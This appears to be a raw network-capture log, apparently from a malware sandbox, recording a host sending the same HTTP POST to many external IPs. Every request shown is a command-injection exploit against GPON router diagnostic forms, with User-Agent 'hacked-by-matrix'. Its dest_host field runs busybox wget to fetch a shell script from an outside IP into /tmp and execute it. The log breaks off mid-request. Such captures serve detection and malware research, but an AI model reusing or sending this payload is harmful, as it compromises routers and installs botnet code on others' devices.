                                                        Mar 21, 2024 05:22:20.516457081 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        401192.168.2.1359524118.11.89.19443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:20.516468048 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        402192.168.2.1347238109.61.146.186443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:20.516489983 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        403192.168.2.1351532109.166.62.130443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:20.516500950 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        404192.168.2.1336702212.37.185.98443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:20.516501904 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        405192.168.2.13470805.117.145.136443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:20.516531944 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        406192.168.2.1337480109.226.195.92443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:20.516535044 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        407192.168.2.1341960212.192.54.175443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:20.516552925 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        408192.168.2.135956642.43.193.199443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:20.516561031 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        409192.168.2.1345366212.81.171.54443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:20.516594887 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        410192.168.2.134410842.200.114.76443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:20.516594887 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        411192.168.2.1341616118.200.70.10443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:20.516628981 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        412192.168.2.1346132118.239.120.214443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:20.516633987 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        413192.168.2.133325642.196.91.60443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:20.516638994 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        414192.168.2.1357472212.96.44.169443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:20.516648054 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        415192.168.2.1346332118.141.231.41443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:20.516663074 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        416192.168.2.1360826118.183.36.141443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:20.516684055 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        417192.168.2.1345486212.105.121.192443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:20.516695023 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        418192.168.2.1357534109.30.6.238443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:20.516695976 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        419192.168.2.135070442.87.51.21443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:20.516741037 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        420192.168.2.1336668118.221.73.161443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:20.516748905 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        421192.168.2.1336058212.120.3.47443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:20.516798973 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        422192.168.2.1355710109.227.9.211443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:20.516803980 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        423192.168.2.1359354212.29.218.204443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:20.516812086 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
